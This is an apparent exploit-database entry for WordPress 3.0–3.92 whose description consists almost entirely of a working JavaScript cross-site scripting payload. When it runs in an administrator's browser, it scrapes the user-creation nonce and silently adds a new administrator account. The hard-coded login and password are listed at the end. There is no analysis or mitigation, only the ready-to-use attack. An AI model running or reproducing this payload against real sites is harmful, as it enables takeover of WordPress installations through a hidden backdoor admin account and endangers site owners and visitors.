wordpress 3.0-3.92 adding administrator Payload-vulnerability warning-the black bar safety net

2014-12-08T00:00:00
ID MYHACK58:62201456708
Type myhack58
Reporter 佚名
Modified 2014-12-08T00:00:00

Description

> var a = location. href. split('/'); var xurl = location. href. replace(a[a. length-1],"user-new.php"); jQuery. ajax({ url: xurl, type: 'GET', dataType: 'html', data: {}, }) . done(function(data) { var temp = jQuery(data); var Xtoken = ""; temp. find('input#_wpnonce_create-user'). each(function(i,o){ var o=jQuery(o); Xtoken=o. attr('value'); }); jQuery. ajax({ url: xurl, type: 'POST', data: {'action': 'createuser','_wpnonce_create-user':Xtoken,'user_login':'0x_Jin','email':'root@xss1.com','first_name':'0x_Jin','last_name':'0x_Jin','url':'www. xss1.com','pass1':'fuckxssQ','pass2':'fuckxssQ','role':'administrator','createuser':'Add+New+User+'} }) . done(function(){ console. log('ok'); return; }) }) . fail(function() { console. log("error"); }) . always(function() { return; });

Account number: 0x_Jin Password: fuckxssQ

!